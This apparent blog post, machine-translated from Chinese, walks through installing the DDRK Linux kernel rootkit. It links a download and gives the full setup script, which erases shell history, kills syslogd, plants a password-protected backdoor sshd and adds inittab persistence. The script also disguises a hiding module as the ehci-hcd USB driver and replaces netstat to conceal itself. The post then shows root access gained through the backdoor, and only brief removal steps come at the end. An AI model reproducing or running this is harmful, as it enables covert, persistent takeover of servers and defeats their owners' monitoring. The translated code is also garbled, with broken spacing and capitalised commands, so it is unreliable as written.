DDRK is a kernel-level rootkit that combines the advantages of shv and adore-ng in Linux.
DDRK files:
Netstat # Replace netstat in the system, read the port from the ssh configuration file, and hide it
Rk. ko # kernel module to hide files and processes
Setup # rootkit Installation File
Tty # ava Tool
Bin. tgz
--- Ttymon
--- Sshd. tgz
---. Sh
--- Shdcf2 # sshd configuration file
--- Shhk
--- Shhk. pub
--- Shrs
--- Sshd # sshd main program
DDRK: http://www.sectop.com/soft/ddrk.tgz
Therefore, you only need to upload these files to the server and run them successfully to obtain the root permission of the server. Do whatever you want.
The setup content is as follows:
#! /Bin/bash
########## Define variables ##########
DEFPASS = 123456 // default password
DEFPORT = 43958 // default port
BASEDIR = 'pwd'
SSHDIR =/lib/libsh. so
HOMEDIR =/usr/lib/libsh
Unset HISTFILE; unset HISTSIZE; unset HISTORY; unset HISTSAVE; unset HISTFILESIZE
Export PATH = $ PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
########## Check is root ##########
If ["$ (whoami )"! = "Root"]; then
Echo "become root and try again"
Echo ""
Exit
Fi
########## Extract all tar ##########
Tar zxf bin. tgz
Cd bin
Tar zxf sshd. tgz
Rm-rf./sshd. tgz
Cd $ BASEDIR
Rm-rf bin. tgz
Cd $ BASEDIR
######### Kill syslogd ##########
Killall-9 syslogd>/dev/null 2> & 1
Sleep 2
########## Remove sh. conf ##########
If [-f/etc/sh. conf]; then
Rm-rf/etc/sh. conf // password file encrypted by md5sum
Fi
######### Initialize sshd configuration ##########
If test-n "$1"; then
Echo "Using Password: $1"
Cd $ BASEDIR/bin
Echo-n $1 | md5sum>/etc/sh. conf
Else
Echo "No Password Specified, using default-$ DEFPASS"
Echo-n $ DEFPASS | md5sum>/etc/sh. conf
Fi
Touch-acmr/bin/ls/etc/sh. conf
Chown-f root: root/etc/sh. conf
If test-n "$2"; then
Echo "Using ssh-port: $2"
Echo "Port $2" >>$ BASEDIR/bin/. sh/sshd_config
Cat $ BASEDIR/bin/. sh/shdcf2> $ BASEDIR/bin/. sh/sshd_config; rm-rf $ BASEDIR/bin/. sh/shdcf2
Mv $ BASEDIR/bin/. sh/sshd_config $ BASEDIR/bin/. sh/shdcf
Else
Echo "No ssh-port Specified, using default-$ DEFPORT"
Echo "Port $ DEFPORT"> $ BASEDIR/bin/. sh/sshd_config
Cat $ BASEDIR/bin/. sh/shdcf2> $ BASEDIR/bin/. sh/sshd_config; rm-rf $ BASEDIR/bin/. sh/shdcf2
Mv $ BASEDIR/bin/. sh/sshd_config $ BASEDIR/bin/. sh/shdcf
Fi
########### Creating dirs ##########
SSHDIR =/lib/libsh. so
HOMEDIR =/usr/lib/libsh
If [-d/lib/libsh. so]; then
Rm-rf/lib/libsh. so
Fi
If [-d/usr/lib/libsh]; then
Rm-rf/usr/lib/libsh /*
Fi
Mkdir $ SSHDIR
Touch-acmr/bin/ls $ SSHDIR
Mkdir $ HOMEDIR
Touch-acmr/bin/ls $ HOMEDIR
Cd $ BASEDIR/bin
Mv. sh/* $ SSHDIR/
Mv. sh/. bashrc $ HOMEDIR
If [-f/sbin/ttyload]; then
Chattr-AacdisSu/sbin/ttyload
Rm-rf/sbin/ttyload
Fi
If [-f/usr/sbin/ttyload]; then
Rm-rf/usr/sbin/ttyload
Fi
If [-f/sbin/ttymon]; then
Rm-rf/sbin/ttymon
Fi
Mv $ SSHDIR/sshd/sbin/ttyload
Chmod a + xr/sbin/ttyload
Chmod o-w/sbin/ttyload
Touch-acmr/bin/ls/sbin/ttyload
Kill-9 'pidof ttyload'>/dev/null 2> & 1
Mv $ BASEDIR/bin/ttymon/sbin/ttymon
Chmod a + xr/sbin/ttymon
Touch-acmr/bin/ls/sbin/ttymon
Kill-9 'pidof ttymon'>/dev/null 2> & 1
Cp/bin/bash $ SSHDIR
######### Modify inittab ##########
Cp/etc/inittab/etc/. inittab
Sed-e s @ ^ :2345 @ 0: 2345: once:/usr/sbin/ttyload & @/etc/inittab>/etc/. inittab
Touch-acmr/etc/inittab/etc/. inittab
Mv-f/etc/. inittab/etc/inittab
Echo "/sbin/ttyload-q>/dev/null 2> & 1">/usr/sbin/ttyload
Echo "/sbin/ttymon>/dev/null 2> & 1">/usr/sbin/ttyload
Echo "$ {HOMEDIR}/tty I 'pidof ttyload'>/dev/null 2> & 1">/usr/sbin/ttyload
Echo "$ {HOMEDIR}/tty I 'pidof ttymon'>/dev/null 2> & 1">/usr/sbin/ttyload
Touch-acmr/bin/ls/usr/sbin/ttyload
Chmod 755/usr/sbin/ttyload
/Usr/sbin/ttyload>/dev/null 2> & 1
Touch-amcr/bin/ls/etc/inittab
########## Make sure inittab has modified ##########
If [! "'Grep ttyload/etc/inittab '"]; then
Echo "# WARNING-sshd wont be reloaded upon restart"
Echo "# inittab shuffling probly fucked-up! "
Fi
########## Load rk. ko ##########
Cd $ BASEDIR
Modprobe-r ehci-hcd
Mv-f rk. ko/lib/modules/'uname-R'/kernel/drivers/usb/host/ehci-hcd.ko
Modprobe ehci-hcd
Mv tty $ HOMEDIR
########## Replace netstat ##########
Touch-acmr/bin/netstat
Mv-f netstat/bin/netstat
######### Hide all files and process ##########
$ HOMEDIR/tty h/etc/sh. conf>/dev/null 2> & 1
$ HOMEDIR/tty h/lib/libsh. so>/dev/null 2> & 1
$ HOMEDIR/tty h/usr/lib/libsh>/dev/null 2> & 1
$ HOMEDIR/tty h/sbin/ttyload>/dev/null 2> & 1
$ HOMEDIR/tty h/usr/sbin/ttyload>/dev/null 2> & 1
$ HOMEDIR/tty h/sbin/ttymon>/dev/null 2> & 1
$ HOMEDIR/tty I 'pidof ttyload'>/dev/null 2> & 1
$ HOMEDIR/tty I 'pidof ttymon'>/dev/null 2> & 1
######### Load rk. ko on boot ##########
Cat>/etc/sysconfig/modules/ehci. modules <EOF
#! /Bin/sh
# Install usb modules support
Modprobe-r ehci-hcd
Modprobe ehci-hcd
EOF
Touch-amcr/bin/ls/etc/sysconfig/modules/ehci. modules
Chmod 755/etc/sysconfig/modules/ehci. modules
$ HOMEDIR/tty h/etc/sysconfig/modules/ehci. modules>/dev/null 2> & 1
########## Check iptables setting ##########
If [-f/sbin/iptables]; then
Echo "'/sbin/iptables-l input | head-5 '"
Else
Echo ""
Echo "# lucky for u no iptables found"
Fi
######### Start syslogd ##########
/Sbin/syslogd-m 0
#./Setup 123 3333 // set the password to 123 and the port number to 3333
Usingpassword: 123
Usingssh-port: 3333
Chain INPUT (policy ACCEPT)
Target prot opt source destination
View hidden effects:
View Processes
# Ps-ef | egrep-I "ttyload | ttymon"
Root 24761 17990 0 00:00:00 pts/2 egrep-I ttyload | ttymon
View port
# Netstat-ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
Tcp 0 0 127.0.0.1: 2208 0.0.0.0: * LISTEN 2117/hpiod
-Tcp 0 0 0.0.0.0: 3306 0.0.0.0: * LISTEN 2267/mysqld
Tcp 0 0 0.0.0.0: 43958 0.0.0.0: * LISTEN-
Tcp 0 0 127.0.0.1: 631 0.0.0.0: * LISTEN 2134/cupsd
Tcp 0 0 127.0.0.1: 25 0.0.0.0: * LISTEN 2295/sendmail: acce
Tcp 0 0 127.0.0.1: 2207 0.0.0.0: * LISTEN 2122/python
Udp 0 0 0.0.0.0: 32768 0.0.0.0: * 2417/avahi-daemon:
Udp 0 0 0.0.0.0: 68 0.0.0.0: * 19752/dhclient
Udp 0 0 0.0.0.0: 5353 0.0.0.0: * 2417/avahi-daemon:
Udp 0 0 0.0.0.0: 631 0.0.0.0: * 2134/cupsd
View the load Module
# Lsmod | grep-I ehci-hcd
View rootkit Related Files
# Ls-dl/lib/libsh. so/usr/lib/libsh/etc/sh. conf/sbin/ttyload/sbin/ttymon/bin/ttymon/usr/sbin/ttyload
Ls:/bin/ttymon: No such file or directory
-Rw-r -- 1 2618748389 4063569279 36 Nov 28 2006/etc/sh. conf
Drwxr-xr-x 2 2618748389 4063569279 4096 May 11/lib/libsh. so
-Rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28 2006/sbin/ttyload
-Rwxrwxr-x 1 2618748389 4063569279 93476 Nov 28 2006/sbin/ttymon
Drwxr-xr-x 2 2618748389 4063569279 4096 May 11/usr/lib/libsh
-Rwxr-xr-x 1 2618748389 4063569279 171 Nov 28 2006/usr/sbin/ttyload
View the/etc/inittab File
# Run gettys in standard runlevels
0: 2345: once:/usr/sbin/ttyload
1: 2345: respawn:/sbin/mingetty tty1
2: 2345: respawn:/sbin/mingetty tty2
3: 2345: respawn:/sbin/mingetty tty3
4: 2345: respawn:/sbin/mingetty tty4
5: 2345: respawn:/sbin/mingetty tty5
6: 2345: respawn:/sbin/mingetty tty6
Verification:
The Host IP address that has been cracked and successfully executed is 192.168.27.129.
Log on to 192.168.27.129 from another server. Set the password to 123 and the port number to 3333.
[Root @ localhost ~] # Ssh 192.168.27.129-p 3333
A root@192.168.27.129s password:
Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1
[Sh] w. e. l. c. o. m. e
[Sh] To The DoDos Rootkit
[Root @ DoDo:/root] #
[Root @ DoDo:/root] # env
TERM = xterm
SHELL =/bin/bash
SSH_CLIENT = 192.168.27.13038824 3333
SSH_TTY =/dev/pts/3
USER = root
LS_COLORS = no = 00: fi = 00: di = 01; 34: ln = 01; 36: pi = 40; 33: so = 01; 35: bd = 40; 33; 01: cd = 40; 33; 01: or = 01; 05; 37; 41:
Mi = 01; 05; 37; 41: ex = 01; 32 :*. cmd = 01; 32 :*. exe = 01; 32 :*. com = 01; 32 :*. btm = 01; 32 :*. bat = 01; 32 :*. sh = 01; 32 :*.
Csh = 01; 32 :*. tar = 01; 31 :*. tgz = 01; 31 :*. arj = 01; 31 :*. taz = 01; 31 :*. lzh = 01; 31 :*. zip = 01; 31 :*. z = 01; 31 :*. Z = 01; 31:
*. Gz = 01; 31 :*. bz2 = 01; 31 :*. bz = 01; 31 :*. tz = 01; 31 :*. rpm = 01; 31 :*. cpio = 01; 31 :*. jpg = 01; 35 :*. gif = 01; 35 :*. bmp
= 01; 35: *. xbm = 01; 35: *. xpm = 01; 35: *. png = 01; 35: *. tif = 01; 35:
MAIL =/var/spool/mail/root
PATH =/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin: /usr/lib/libs :.
PWD =/root
MACHINE = DoDo
PS1 = [33 [0; 36 m] [$ ID @ [33 [1; 37 m] $ MACHINE [33 [0 m] [33 [0; 36 m]: $ {PWD}] #[33 [0 m]
SHLVL = 1
HOME =/usr/lib/libsh
ID = root
LOGNAME = root
_ =/Bin/env
So far, you can fully control 192.168.27.129.
Go to 192.168.27.129 to view the logon User:
# W
13:40:55 up, 0 users, load average: 1.23, 0.93, 0.77
User tty from login @ IDLE JCPU PCPU WHAT
Only Local Users are allowed.
Clear method:
# Cd/usr/lib/libsh
# Modprobe-r ehci-hcd
#./Tty u/etc/sysconfig/modules/ehci. modules
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# Rm-rf/etc/sysconfig/modules/ehci. modules
# Rm-rf/lib/modules/'uname-R'/kernel/drivers/usb/host/ehci-hcd.ko
#./Tty u/etc/sh. conf
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#./Tty u/lib/libsh. so
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#./Tty u/sbin/ttyload
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#./Tty u/usr/sbin/ttyload
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#./Tty u/sbin/ttymon
Checking for adore 0.12 or higher...
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# Rm-rf/etc/sh. conf/lib/libsh. so/usr/lib/libsh/sbin/ttyload/usr/sbin/ttyload/sbin/ttymon
# Rm-rf/bin/netstat
# Vim/etc/inittab remove 0: 2345: once:/usr/sbin/ttyload
In fact, you should also check where the system vulnerabilities are located to eliminate future risks.
This article is from the blog "Yan que an Zhihong zhizai ".